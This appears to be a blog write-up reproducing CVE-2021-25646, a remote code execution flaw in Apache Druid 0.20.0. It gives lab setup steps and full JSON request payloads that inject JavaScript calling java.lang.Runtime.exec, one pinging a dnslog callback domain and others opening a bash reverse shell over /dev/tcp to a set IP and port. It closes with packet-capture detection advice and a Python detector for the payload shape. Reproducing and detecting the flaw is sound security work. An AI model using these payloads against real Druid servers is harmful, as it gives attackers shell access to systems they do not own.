  • CVE-2021-25646 (Apache Druid 8888) vulnerability reproduction

    Environment: pull Apache Druid 0.20.0 directly with docker

    Steps:

    1. Open the home page (opening it via localhost does not work properly)

    2. Load data → Local disk

    3. Base directory >> quickstart/tutorial

    4. File filter >> wikiticker-2015-09-12-sampled.json.gz

    5. Preview

    6. Next: Parse data (route the browser through a proxy, Burp Suite)

    7. Modify the request packet and fill in the payload

    DNS query payload

    ```json
    {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
    "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 7wsyab.dnslog.cn')}",
    "dimension":"added",
    "":{
    "enabled":"true"
    }
    }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
    ```
    ```json
    {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
    "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')}",
    "dimension":"added",
    "":{
    "enabled":"true"
    }
    }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
    ```

    The following statement is the code that executes the command:

    "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.200.128/7777 0>&1')}"
    

    When running under docker, start the experiment while the docker command is still loading the data; if you exit docker midway and start it again, druid may fail to take over the data import, and the payload will then keep failing.

    To decide from a network-layer packet capture whether a request is an attack, rely mainly on the extra part of the body and the command-execution code: a normal request never calls the java.lang.Runtime.getRuntime() function and never contains this extra section, and the command-execution code is the key to determining what this attack was trying to achieve.

    ```
    ":[],"filter":{"type":"javascript",
    "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.200.128/4444 0>&1')}",
    "dimension":"added",
    "":{
    "enabled":"true"
    }
    }}}},"
    ```
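    An added example (not from the original post) of the detection idea above: it parses a sampler request body and flags a JavaScript-typed filter, the empty-key `"":{"enabled":"true"}` object, and any string that calls java.lang.Runtime, extracting the exec argument so an analyst can see what the command was. The two request bodies are constructed for the demo, with the command replaced by a harmless `id`; the patterns are assumptions drawn from the payload shape shown here, not Druid's own code.

```python
import json
import re

# Hallmarks of the payload shape shown in this write-up (assumed patterns, not Druid code).
RUNTIME_RE = re.compile(r"java\.lang\.Runtime|getRuntime\(\)|ProcessBuilder")
EXEC_ARG_RE = re.compile(r"\.exec\(\s*(['\"])(.*?)\1\s*\)")


def walk(node, path="$"):
    """Yield (json_path, value) for every node of a decoded JSON document."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")


def inspect_sampler_request(body):
    """Return (reason, json_path, detail) findings for one sampler request body;
    for a Runtime finding the detail is the exec argument, i.e. the command string."""
    findings = []
    for path, node in walk(json.loads(body)):
        if isinstance(node, dict):
            if node.get("type") == "javascript":
                findings.append(("javascript-typed spec", path, node.get("function", "")))
            inner = node.get("")
            if isinstance(inner, dict) and str(inner.get("enabled")).lower() == "true":
                findings.append(("empty-key enabled:true override", path, inner))
        elif isinstance(node, str) and RUNTIME_RE.search(node):
            match = EXEC_ARG_RE.search(node)
            cmd = match.group(2) if match else "(exec argument not found)"
            findings.append(("java.lang.Runtime call in string value", path, cmd))
    return findings


# Constructed sample bodies: a benign selector filter, and the javascript filter
# shape from the write-up with the command replaced by a harmless 'id'.
BENIGN = json.dumps({"type": "index", "spec": {"dataSchema": {"transformSpec": {
    "filter": {"type": "selector", "dimension": "channel", "value": "#en.wikipedia"}}}}})
SUSPECT = json.dumps({"type": "index", "spec": {"dataSchema": {"transformSpec": {
    "filter": {"type": "javascript", "dimension": "added", "": {"enabled": "true"},
               "function": "function(value){return java.lang.Runtime.getRuntime().exec('id')}"}}}}})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        for reason, path, detail in inspect_sampler_request(body):
            print(f"{name}: {reason} at {path}: {detail}")
```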
  • Original article: https://www.cnblogs.com/TwoCousinElizabeth/p/14388878.html